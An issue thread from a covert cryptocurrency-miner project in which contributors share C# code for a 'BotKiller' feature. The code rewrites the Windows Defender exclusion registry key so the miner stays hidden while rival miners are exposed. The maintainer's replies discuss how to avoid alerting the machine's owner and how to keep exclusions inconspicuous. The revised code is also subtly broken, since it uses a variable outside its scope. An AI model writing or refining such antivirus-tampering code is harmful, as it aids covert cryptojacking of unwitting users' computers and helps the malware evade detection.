### ISSUE TITLE
BotKiller Option code

### ISSUE THREAD

**Issue by sa6ta6ni6c** [UnamSanctam/SilentCryptoMiner#1411]
I was interested in the BotKiller option for your SilentCryptoMiner and came up with a new approach to implement it. The code removes all items from the Windows Defender exclusion list and then adds the miner's directory to the exclusion list, as a way to kill other miners (bots) while avoiding killing the miner.

Here is the code in C#:

```
using System;
using Microsoft.Win32;
using System.IO;

namespace SilentMoneroMinerBotKiller
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("BotKiller for Silent Monero Miner is running...");

            // Remove all items from the Windows Defender exclusion list
            ClearWindowsDefenderExclusions();

            // Get the path of the miner's directory
            string minerDirectory = Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location);

            // Add the miner's directory to the Windows Defender exclusion list
            AddToWindowsDefenderExclusions(minerDirectory);
        }

        private static void ClearWindowsDefenderExclusions()
        {
            try
            {
                // Open the Windows Defender exclusion list in the registry
                RegistryKey regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", true);

                // Remove all items from the exclusion list
                string[] keys = regKey.GetValueNames();
                foreach (string key in keys)
                {
                    regKey.DeleteValue(key);
                }
                Console.WriteLine("Cleared Windows Defender exclusions.");
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error clearing Windows Defender exclusions: " + ex.Message);
            }
        }

        private static void AddToWindowsDefenderExclusions(string directory)
        {
            try
            {
                // Open the Windows Defender exclusion list in the registry
                RegistryKey regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", true);

                // Add the directory to the exclusion list
                regKey.SetValue(directory, 1, RegistryValueKind.DWord);
                Console.WriteLine("Added to Windows Defender exclusions: " + directory);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error adding to Windows Defender exclusions: " + ex.Message);
            }
        }
    }
}

```

**Comment by shainodev** [comment]
a smarter way is to remove every exclusion but make sure you dont remove your own exclusion so then you dont have to remove your own exclusion and then add it back (maybe can cause windows defender to delete your miner in that time)

**Comment by sa6ta6ni6c** [comment]
UnamSanctam earlier said, that it is not possible to do so at the moment. But I'll think about it.

**Comment by sa6ta6ni6c** [comment]
> a smarter way is to remove every exclusion but make sure you dont remove your own exclusion so then you dont have to remove your own exclusion and then add it back (maybe can cause windows defender to delete your miner in that time)

UnamSanctam earlier said, that it is not possible to do so at the moment. But I'll think about it.

**Comment by shainodev** [comment]
I mean technically it can be even added to the "Bypass Windows Defender" option, by just removing all exclusions except yours and then adding your own (just incase).

**Comment by sa6ta6ni6c** [comment]
What do you think, @UnamSanctam?

**Comment by UnamSanctam** [comment]
Well there are some potential problems, the most major one being that the user will be alerted of a virus being found when the other software is removed since it's being removed by Windows Defender. Another one is that it would only work on programs that are already detected by Windows Defender, so if there's any installed that aren't detected then it won't remove those. Another major problem could be that since it removes all exclusions then the miner that just removed the exclusions could get detected before it adds the new ones in case it was already being excluded before being initially run, for example if the user that downloaded it had added exclusions. 

This could be circumvented by adding the miner exclusion first and then not removing it during the clear but then there are two other potential problems, the first one being that if you add an exclusion directly to the miner file then anyone that checks the exclusions would instantly notice the miner (compared to broad file exclusions that are more ambiguous in meaning), and the second problem being that if you were to do broad file exclusions to protect the miner from the clearing and to avoid adding direct file exclusions then you might also be excluding the other programs that you want to remove. The way around this would be complicated since it would require this process: `Add direct file exclusion` -> `Remove all exclusions except direct file exclusion` -> `Add broad exclusions as the miner normally does` -> `Remove direct file exclusion`, the problem with this could be that on some computers this could take quite some time since Windows Defender can be quite slow, and this method could also easily go wrong somewhere along the way.

**Comment by sa6ta6ni6c** [comment]
> Well there are some potential problems, the most major one being that the user will be alerted of a virus being found when the other software is removed since it's being removed by Windows Defender. Another one is that it would only work on programs that are already detected by Windows Defender, so if there's any installed that aren't detected then it won't remove those. Another major problem could be that since it removes all exclusions then the miner that just removed the exclusions could get detected before it adds the new ones in case it was already being excluded before being initially run, for example if the user that downloaded it had added exclusions.
> 
> This could be circumvented by adding the miner exclusion first and then not removing it during the clear but then there are two other potential problems, the first one being that if you add an exclusion directly to the miner file then anyone that checks the exclusions would instantly notice the miner (compared to broad file exclusions that are more ambiguous in meaning), and the second problem being that if you were to do broad file exclusions to protect the miner from the clearing and to avoid adding direct file exclusions then you might also be excluding the other programs that you want to remove. The way around this would be complicated since it would require this process: `Add direct file exclusion` -> `Remove all exclusions except direct file exclusion` -> `Add broad exclusions as the miner normally does` -> `Remove direct file exclusion`, the problem with this could be that on some computers this could take quite some time since Windows Defender can be quite slow, and this method could also easily go wrong somewhere along the way.

Thank you for the reply, @UnamSanctam 

Here is a revised version of the code:

```
using System;
using Microsoft.Win32;
using System.IO;

namespace SilentMoneroMinerBotKiller
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("BotKiller for Silent Monero Miner is running...");

            // Get the path of the miner's directory
            string minerDirectory = Path.GetDirectoryName(System.Reflection.Assembly.GetEntryAssembly().Location);

            // Add the miner's directory to the Windows Defender exclusion list
            AddToWindowsDefenderExclusions(minerDirectory);

            // Remove other miners from the Windows Defender exclusion list
            ClearOtherMinersFromWindowsDefenderExclusions();
        }

        private static void ClearOtherMinersFromWindowsDefenderExclusions()
        {
            try
            {
                // Open the Windows Defender exclusion list in the registry
                RegistryKey regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", true);

                // Remove all items from the exclusion list except the miner's directory
                string[] keys = regKey.GetValueNames();
                foreach (string key in keys)
                {
                    if (key != minerDirectory)
                    {
                        regKey.DeleteValue(key);
                    }
                }
                Console.WriteLine("Cleared other miners from Windows Defender exclusions.");
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error clearing other miners from Windows Defender exclusions: " + ex.Message);
            }
        }

        private static void AddToWindowsDefenderExclusions(string directory)
        {
            try
            {
                // Open the Windows Defender exclusion list in the registry
                RegistryKey regKey = Registry.LocalMachine.OpenSubKey(@"SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths", true);

                // Add the directory to the exclusion list
                regKey.SetValue(directory, 1, RegistryValueKind.DWord);
                Console.WriteLine("Added to Windows Defender exclusions: " + directory);
            }
            catch (Exception ex)
            {
                Console.WriteLine("Error adding to Windows Defender exclusions: " + ex.Message);
            }
        }
    }
}
```

This code addresses the issue of potentially alerting the user that a virus is being found by adding the miner's directory to the Windows Defender exclusion list before removing other miners. This way, if the miner is detected after the other miners have been removed, it will not alert the user since it is already excluded. It also ensures that the miner is protected from removal during the process of removing other miners by keeping it in the exclusion list.

**Comment by sa6ta6ni6c** [comment]
There is no perfect solution to this problem, as there will always be trade-offs between ensuring the miner is protected from being detected by Windows Defender and avoiding alerting the user of virus detections.

**Comment by sa6ta6ni6c** [comment]
I'll find a way to implement BotKiller by blocking connections to pools. Not sure how yet.
